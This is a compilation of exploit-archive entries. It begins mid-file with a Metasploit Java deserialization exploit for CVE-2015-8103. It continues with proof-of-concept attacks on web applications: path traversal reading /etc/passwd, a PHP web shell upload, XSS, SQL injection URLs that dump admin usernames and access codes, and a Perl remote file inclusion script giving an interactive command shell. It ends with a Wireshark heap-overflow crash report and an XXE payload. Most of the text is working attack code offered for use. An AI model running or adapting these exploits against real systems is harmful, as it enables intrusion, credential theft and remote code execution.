def print_status(msg='')
super("#{rhost}:#{rport} - #{msg}")
end
#
# Serialized stream generated with:
# https://github.com/dmohanty-r7/ysoserial/blob/stager-payloads/src/main/java/ysoserial/payloads/CommonsCollections3.java
#
def set_payload
stream = Rex::Java::Serialization::Model::Stream.new
handle = File.new(File.join( Msf::Config.data_directory, "exploits", "CVE-2015-8103", 'serialized_file_writer' ), 'rb')
decoded = stream.decode(handle)
handle.close
inject_payload_into_stream(decoded).encode
end
#
# Serialized stream generated with:
# https://github.com/dmohanty-r7/ysoserial/blob/stager-payloads/src/main/java/ysoserial/payloads/ClassLoaderInvoker.java
#
def class_load_payload
stream = Rex::Java::Serialization::Model::Stream.new
handle = File.new(File.join( Msf::Config.data_directory, 'exploits', 'CVE-2015-8103', 'serialized_class_loader' ), 'rb')
decoded = stream.decode(handle)
handle.close
inject_class_loader_into_stream(decoded).encode
end
def inject_class_loader_into_stream(decoded)
file_name_utf8 = get_array_chain(decoded)
.values[2]
.class_data[0]
.values[1]
.values[0]
.values[0]
.class_data[3]
file_name_utf8.contents = get_random_file_name
file_name_utf8.length = file_name_utf8.contents.length
class_name_utf8 = get_array_chain(decoded)
.values[4]
.class_data[0]
.values[0]
class_name_utf8.contents = 'metasploit.Payload'
class_name_utf8.length = class_name_utf8.contents.length
decoded
end
def get_random_file_name
@random_file_name ||= "#{Rex::FileUtils.normalize_unix_path(datastore['TEMP'], "#{rand_text_alpha(4 + rand(4))}.jar")}"
end
def inject_payload_into_stream(decoded)
byte_array = get_array_chain(decoded)
.values[2]
.class_data
.last
byte_array.values = payload.encoded.bytes
file_name_utf8 = decoded.references[44].class_data[0]
rnd_fname = get_random_file_name
register_file_for_cleanup(rnd_fname)
file_name_utf8.contents = rnd_fname
file_name_utf8.length = file_name_utf8.contents.length
decoded
end
def get_array_chain(decoded)
object = decoded.contents[0]
lazy_map = object.class_data[1].class_data[0]
chained_transformer = lazy_map.class_data[0]
chained_transformer.class_data[0]
end
def read_bin_file(bin_file_path)
data = ''
File.open(File.join( Msf::Config.data_directory, "exploits", "CVE-2015-8103", bin_file_path ), 'rb') do |f|
data = f.read
end
data
end
end
================================================================================
Tequila File Hosting Arbitrary File Download
================================================================================
# Vendor Homepage: http://codecanyon.net/item/tequila-file-hosting-script/7604312
# Date: 16/12/2015
# Author: Ashiyane Digital Security Team
# Version: 1.5
# Contact: hehsan979@gmail.com
# Source: http://ehsansec.ir/advisories/tequila-disclose.txt
================================================================================
# Description:
Tequila is a solid, safe, fast, simple and intuitive script which
allows companies or individuals to upload, manage and share their
files online. It is studied in every feature and was produced with
attention to every detail.
# PoC :
# Download Config
http://localhost/tequila/download.php?download.php?filename=files/../include/php/constants.php&name=file.php
# Download passwd
http://localhost/tequila/download.php?filename=files/../../../../../etc/passwd&name=passwd
# (PHP Exploit):
<?php
// page : download.php
echo "Tequila File Hosting Arbitrary File Download Exploiter\n";
echo "Discoverd By Ehsan Hosseini\n\n\n";
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL,
"http://SERVER/download.php?filename=files/../include/php/constants.php&name=file.php");
curl_setopt($ch, CURLOPT_HTTPGET, 1);
curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE
5.01; Windows NT 5.0)");
$buf = curl_exec ($ch);
curl_close($ch);
unset($ch);
echo $buf;
?>
# Vulnerabile code:
<?php
//This script forces the download of the file
//Retrieving the file name from the querystring
//and the stepping stone path to the download folder
$fn = (isset($_GET['filename']) ? $_GET['filename'] : false);
$file = $fn;
$sn = (isset($_GET['name']) ? $_GET['name'] : false);
$secure_name = $sn;
if (strpos($file, "files/") !== false) {
$checkdownload = "true";
} else {
$checkdownload = "false";
}
//I verify that the file exists
if($checkdownload == "true"){
if (!file_exists($file)) {
//If there is mold an error
echo "The file does not exist!";
} else {
//If the file exists ...
//Imposed on the header of the page to force the download of the file
header("Cache-Control: public");
header("Content-Description: File Transfer");
header('Content-Type: application/zip');
header("Content-Disposition: attachment; filename= " . $secure_name);
header("Content-Transfer-Encoding: binary");
header('Connection: Keep-Alive');
header('Expires: 0');
header('Cache-Control: must-revalidate, post-check=0, pre-check=0');
header('Pragma: public');
//I read the contents of the file
readfile($file);
exit;
}
}
?>
#######################################################################
================================================================================
Tequila File Hosting Unrestricted File Upload
================================================================================
# PoC :
First register in the site===>
http://localhost/tequila/register.php
Next using this exploit :
<?php
// page : upload.php
$postData = array('folder' => '/username', 'file' => '@shell.php');
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "http://localhost/tequila/upload.php");
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $postData );
$buf = curl_exec ($ch);
curl_close($ch);
unset($ch);
echo $buf;
?>
or
curl -i -F folder='/ehsann' -F file=@ehsan.png
http://localhost/tequila/upload.php
Sheller uploaded.
Path of shell : http://localhost/tequila/files/username/shell.php
#######################################################################
================================================================================
Tequila File Hosting Coss Site Scripting
================================================================================
# PoC :
http://localhost/files.php?folder="><script>alert('Ehsan')</script>
http://easyhost.me/file.php?file="><script>alert('Ehsan')</script>
================================================================================
# Discovered By : Ehsan Hosseini (EhsanSec.ir)
================================================================================
source: https://www.securityfocus.com/bid/64720/info
Dredge School Administration System is prone to the following security vulnerabilities:
1. An SQL-injection vulnerability
2. A cross-site request forgery vulnerability
3. A cross-site scripting vulnerability
4. An information-disclosure vulnerability
5. A security-bypass vulnerability
Exploiting these issues could allow an attacker to execute arbitrary script codes, steal cookie-based authentication credentials, compromise the application, access or modify data, exploit latent vulnerabilities in the underlying database, obtain sensitive information or bypass certain security restrictions to perform unauthorized actions.
Dredge School Administration System 1.0 is vulnerable; other versions may also be affected.
http://www.example.com/DSM/loader.php?load=editsession&Id=null+and+1=2+union+select+username,2,3,4,AccessCode,6+from+adminstaff
http://www.example.com/DSM/loader.php?load=editterm&Id=null+and+1=2+union+select+concat(username,0x3a,AccessCode),2,3,4+from+adminstaff
http://www.example.com/DSM/loader.php?load=editclass&Id=null+and+1=2+union+select+concat(username,0x3a,AccessCode),2,3,4,5,6+from+adminstaff
# Title: Ovidentia Module bulletindoc 2.9 Multiple Remote File Inclusion Vulnerabilities
# Author: bd0rk
# eMail: bd0rk[at]hackermail.com
# Twitter: twitter.com/bd0rk
# Tested on: Ubuntu-Linux
# Download: http://www.ovidentia.org/index.php?tg=fileman&sAction=getFile&id=17&gr=Y&path=Downloads%2FAdd-ons%2FModules%2Fbulletindoc&file=bulletindoc-2-9.zip&idf=792
PoC1:
/bulletindoc-2-9/programs/admin.php line 2
------------------------------------------------------
include $babInstallPath."admin/acl.php";
------------------------------------------------------
[+]Sploit1: http://[s0me0ne]/bulletindoc-2-9/programs/admin.php?babInstallPath=[EviLCode]
Description: The $babInstallPath-parameter isn't declared before include.
So an attacker can execute evil-code 'bout this.
PoC2:
/bulletindoc-2-9/programs/main.php line 2
-------------------------------------------------------
require_once( $GLOBALS['babAddonPhpPath']."fonctions.php");
-------------------------------------------------------
[+]Sploit2: http://[s0me0ne/bulletindoc-2-9/programs/main.php?GLOBALS[babAddonPhpPath]=SHELLCODE?
Description: The problem is the same as the first. -.-
It's possible to compromise the system.
### The 27 years old, german hacker bd0rk ###
Greetz: Kacper Szurek, High-Tech Bridge, rgod, LiquidWorm
Source: https://code.google.com/p/google-security-research/issues/detail?id=650
The following crash due to a heap-based buffer overflow can be observed in an ASAN build of Wireshark (current git master), by feeding a malformed file to tshark ("$ ./tshark -nVxr /path/to/file"):
--- cut ---
==9819==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x603000027b3c at pc 0x00000087416b bp 0x7fff95547770 sp 0x7fff95547768
WRITE of size 1 at 0x603000027b3c thread T0
#0 0x87416a in iseries_parse_packet wireshark/wiretap/iseries.c:820:27
#1 0x870589 in iseries_read wireshark/wiretap/iseries.c:382:10
#2 0x9d64c2 in wtap_read wireshark/wiretap/wtap.c:1314:7
#3 0x535c1a in load_cap_file wireshark/tshark.c:3479:12
#4 0x52c1df in main wireshark/tshark.c:2197:13
0x603000027b3c is located 3 bytes to the right of 25-byte region [0x603000027b20,0x603000027b39)
allocated by thread T0 here:
#0 0x4d6ff8 in __interceptor_malloc llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:40
#1 0x7ff6f1a34610 in g_malloc (/lib/x86_64-linux-gnu/libglib-2.0.so.0+0x4e610)
#2 0x870589 in iseries_read wireshark/wiretap/iseries.c:382:10
#3 0x9d64c2 in wtap_read wireshark/wiretap/wtap.c:1314:7
#4 0x535c1a in load_cap_file wireshark/tshark.c:3479:12
#5 0x52c1df in main wireshark/tshark.c:2197:13
SUMMARY: AddressSanitizer: heap-buffer-overflow wireshark/wiretap/iseries.c:820:27 in iseries_parse_packet
Shadow bytes around the buggy address:
0x0c067fffcf10: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c067fffcf20: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c067fffcf30: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c067fffcf40: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c067fffcf50: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
=>0x0c067fffcf60: fa fa fa fa 00 00 00[01]fa fa 00 00 00 00 fa fa
0x0c067fffcf70: 00 00 00 00 fa fa 00 00 00 00 fa fa 00 00 00 00
0x0c067fffcf80: fa fa 00 00 00 00 fa fa 00 00 00 00 fa fa 00 00
0x0c067fffcf90: 00 00 fa fa 00 00 00 00 fa fa 00 00 00 00 fa fa
0x0c067fffcfa0: 00 00 00 00 fa fa 00 00 00 00 fa fa 00 00 00 00
0x0c067fffcfb0: fa fa 00 00 00 00 fa fa 00 00 00 00 fa fa 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Heap right redzone: fb
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack partial redzone: f4
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==9819==ABORTING
--- cut ---
The crash was reported at https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=11798. Attached is a file which triggers the crash.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38992.zip
# Title: Ovidentia Module newsletter 2.2 (admin.php) Remote File Inclusion Exploit
# Author: bd0rk
# eMail: bd0rk[at]hackermail.com
# Twitter: twitter.com/bd0rk
# Tested on: Ubuntu-Linux
# Download: http://www.ovidentia.org/index.php?tg=fileman&sAction=getFile&id=17&gr=Y&path=Downloads%2FAdd-ons%2FModules%2Fnewsletter&file=newsletter-2-2.zip&idf=882
# Proof-of-Concept:
# /newsletter-2-2/programs/admin.php line 3
# ----------------------------------------------------------
# require_once($GLOBALS['babInstallPath'].'admin/acl.php');
# ----------------------------------------------------------
# Problem: The $GLOBALS['babInstallPath']-parameter isn't declared before require_once.
# Fix: Declare this parameter or use an alert in php-sourcecode.
# Zum Beispiel "BummPrengeleng du Nasenmensch!" :D
# ----------------
# ~~Exploitcode~~
# ----------------
use LWP::UserAgent;
$Path = $ARGV[0];
$Pathtocmd = $ARGV[1];
$cmdv = $ARGV[2];
if($Path!~/http:\/\// || $Pathtocmd!~/http:\/\// || !$cmdv){usage()}
head();
while()
{
print "[shell] \$";
while(<STDIN>)
{
$cmd=$_;
chomp($cmd);
$xpl = LWP::UserAgent->new() or die;
$req = HTTP::Request->new(GET =>$Path.'programs/admin.php?GLOBALS[babInstallPath]'.$Pathtocmd.'?&'.$cmdv.'='.$cmd)or die "\nCould Not connect\n";
$res = $xpl->request($req);
$return = $res->content;
$return =~ tr/[\n]/[....]/;
if (!$cmd) {print "\nPlease Enter a Command\n\n"; $return ="";}
elsif ($return =~/failed to open stream: HTTP request failed!/ || $return =~/: Cannot execute a blank command in <b>/)
{print "\nCould Not Connect to cmd Host or Invalid Command Variable\n";exit}
elsif ($return =~/^<br.\/>.<b>Fatal.error/) {print "\nInvalid Command or No Return\n\n"}
if($return =~ /(.*)/)
{
$finreturn = $1;
$finreturn=~ tr/[....]/[\n]/;
print "\r\n$finreturn\n\r";
last;
}
else {print "[shell] \$";}}}last;
sub head()
{
print "\n============================================================================\r\n";
print " *Ovidentia Module newsletter 2.2 (admin.php) Remote File Inclusion Exploit*\r\n";
print "============================================================================\r\n";
}
sub usage()
{
head();
print " Usage: sploit.pl [someone] [cmd shell location] [cmd shell variable]\r\n\n";
print " <Site> - Full path to phgstats ex: http://www.someone.com/ \r\n";
print " <cmd shell> - Path to cmd Shell e.g http://www.someone/cmd.txt \r\n";
print " <cmd variable> - Command variable used in php shell \r\n";
print "============================================================================\r\n";
print " Bug Found by bd0rk \r\n";
print "============================================================================\r\n";
exit();
}
########################################################################################
#______________________________________________________________________________________
# Exploit Title : Article Script SQL Injection Vulnerability
# Exploit Author : Linux Zone Research Team
# Vendor Homepage: http://articlesetup.com/
# Google Dork : inurl:/article.php?id= intext:Powered By Article Marketing
# Software Link : http://www.ArticleSetup.com/downloads/ArticleSetup-Latest.zip
# Date : 15-December-2015
# Version : (Version 1.00)
# CVE : NONE
# Tested On : Linux - Chrome
# Category : Web Application
# MY HOME : http://linux-zone.org/Forums - research@linux-zone.org
#______________________________________________________________________________________
#######################################################################################
#
# localHost/article.php?id=SQL
#______________________________________________________________________________________
## Vulnerability Code
<?php
include('config.php');
//Create site settings variables
$sitequery = 'select * from settings;';
$siteresult = mysql_query($sitequery,$connection) or die(mysql_error());
$siteinfo = mysql_fetch_array($siteresult);
$siteurl = $siteinfo['url'];
$article = $_GET['id'];
if (!is_numeric($article)) {
header('Location: '.$siteurl);
}
else
{
$sitequery = 'select * from settings;';
$siteresult = mysql_query($sitequery,$connection) or die(mysql_error());
//Create site settings variables
$siteinfo = mysql_fetch_array($siteresult);
$sitetitle = $siteinfo['title'];
$siteurl = $siteinfo['url'];
$sitecomments = $siteinfo['comments'];
$commentmod = $siteinfo['commentmod'];
$query = "select * from articles where status=0 and id = ".$article;
$articleresults = mysql_query($query,$connection) or die(mysql_error());
$num_results = mysql_num_rows($articleresults);
$articleinfo = mysql_fetch_array($articleresults);
if (!$num_results) {
header('Location: '.$siteurl);
}
//Get article info
$id = $articleinfo['id'];
$authorid = $articleinfo['authorid'];
$date = strtotime($articleinfo['date']);
$artdate = date('m/d/y', $date);
$categoryid = $articleinfo['categoryid'];
$title = stripslashes($articleinfo['title']);
$body = stripslashes($articleinfo['body']);
$resource = $articleinfo['resource'];
//Meta Info
$cathead = 0;
$metatitle = $title." - ";
include('header.php');
include('sidebar.php');
if ($seourls == 1) { $scrubtitle = generate_seo_link($title); }
// Setup the article template
$articletemp = new Template("templates/".$template."/article.tpl");
// get author info
$authorquery = "select * from authors where id=".$authorid;
$authorresult = mysql_query($authorquery,$connection) or die(mysql_error());
$authorinfo = mysql_fetch_array($authorresult);
$authorname = $authorinfo['displayname'];
$authorbio = $authorinfo['bio'];
$gravatar = $authorinfo['gravatar'];
if ($seourls == 1) { $scrubauthor = generate_seo_link($authorname); }
// get category info
$catquery = "select * from categories where id=".$categoryid;
$catresult = mysql_query($catquery,$connection) or die(mysql_error());
$catinfo = mysql_fetch_array($catresult);
$categoryname = $catinfo['name'];
$catparent = $catinfo['parentid'];
if ($seourls == 1) { $scrubcatname = generate_seo_link($categoryname); }
// if the category doesn't have a parent
if ($catparent == NULL) {
if ($seourls == 1) { // With SEO URLS
$displaycat = "<a href=\"".$siteurl."/category/".$categoryid."/"
.$scrubcatname."/\"><b>".$categoryname."</b></a>";
} else {
$displaycat = "<a href=\"".$siteurl."/category.php?id=".$categoryid
."\"><b>".$categoryname."</b></a>";
}
// if the category DOES have a parent
} else {
$query = "select * from categories where id=".$catparent;
$result = mysql_query($query,$connection) or die(mysql_error());
$info = mysql_fetch_array($result);
$parentname = $info['name'];
if ($seourls == 1) { $scrubparent = generate_seo_link($parentname); }
if ($seourls == 1) { // With SEO URLS
$displaycat = "<a href=\"".$siteurl."/category/".$catparent."/"
.$scrubparent."/\"><b>".$parentname."</b></a> >
<a href=\"".$siteurl."/category/".$categoryid."/"
.$scrubcatname."/\"><b>".$categoryname."</b></a>";
} else {
$displaycat = "<a href=\"".$siteurl."/category.php?id=".$catparent
."\"><b>".$parentname."</b></a> >
<a href=\"".$siteurl."/category.php?id=".$categoryid
."\"><b>".$categoryname."</b></a>";
}
}
// Add a view to this article
$query = "select * from articleviews where articleid = ".$article;
$results = mysql_query($query,$connection) or die(mysql_error());
$viewinfo = mysql_fetch_array($results);
if ($viewinfo == NULL) {
$sql = "INSERT INTO articleviews VALUES (".$article.", 1)";
$query = mysql_query($sql);
} else {
$totalviews = $viewinfo['views'];
$totalviews++;
$sql = "UPDATE articleviews SET views=".$totalviews." WHERE `articleid`=".$article."";
$query = mysql_query($sql);
}
if ($seourls == 1) { // With SEO URLS
$authorlink = "<a href=\"".$siteurl."/profile/".$authorid."/".$scrubauthor."/\"><b>".$authorname."</b></a>";
} else {
$authorlink = "<a href=\"".$siteurl."/profile.php?a=".$authorid."\"><b>".$authorname."</b></a>";
}
// Setup all template variables for display
$articletemp->set("authorname", $authorname);
$articletemp->set("authorlink", $authorlink);
$articletemp->set("date", $artdate);
$articletemp->set("displaycat", $displaycat);
$articletemp->set("views", $totalviews);
$articletemp->set("title", $title);
$articletemp->set("body", $body);
$articletemp->set("gravatar", $gravatar);
$articletemp->set("resource", $resource);
// For the adcode
$query = "select * from adboxes where id=1;";
$result = mysql_query($query,$connection) or die(mysql_error());
$info = mysql_fetch_assoc($result);
$articletemp->set("250adcode", stripslashes($info['adcode']));
// Outputs the homepage template!
echo $articletemp->output();
//Displays the comments -- if admin has them enabled
if($sitecomments == 0) {
echo "<br/><h2>Comments</h2>";
require_once 'comments/classes/Comments.class.php';
/* Article ID which shows the comments */
$post_id = $article;
/* Level of hierarchy comments. Infinit if declared NULL */
$level = NULL;
/* Number of Supercomments (level 0) to display per page */
$supercomments_per_page = 10000;
/* Moderate comments? */
if ($commentmod == 0) {
$moderation = true;
} else {
$moderation = false;
}
# Setup db config array #
$db_config = array("db_name" => $db_name,
"db_user" => $dbusername,
"db_pass" => $dbpassword,
"db_host" => $server );
# Create Object of class comments
$comments = new Comments($post_id, $level, $supercomments_per_page, $moderation, $db_config);
# Display comments #
echo $comments->getComments();
}
include('rightsidebar.php');
include('obinclude.php');
}
?>
#######################################
#
# Hassan Shakeri - Mohammad Habili
#
# Twitter : @ShakeriHassan - Fb.com/General.BlackHat
##########################################################
source: https://www.securityfocus.com/bid/63431/info
Openbravo ERP is prone to an information-disclosure vulnerability.
An attacker can exploit this issue to gain access to sensitive information; this may lead to further attacks.
Openbravo ERP 2.5 and 3.0 are vulnerable.
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ELEMENT comments ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd" > ]>
<ob:Openbravo xmlns:ob="http://www.example.com"
xmlns:xsi="http://www.example1.com/2001/XMLSchema-instance">
<Product id="C970393BDF6C43E2B030D23482D88EED" identifier="Zumo de Piñ,5L">
<id>C970393BDF6C43E2B030D23482D88EED</id>
<comments>&xxe;</comments>
</Product>
</ob:Openbravo>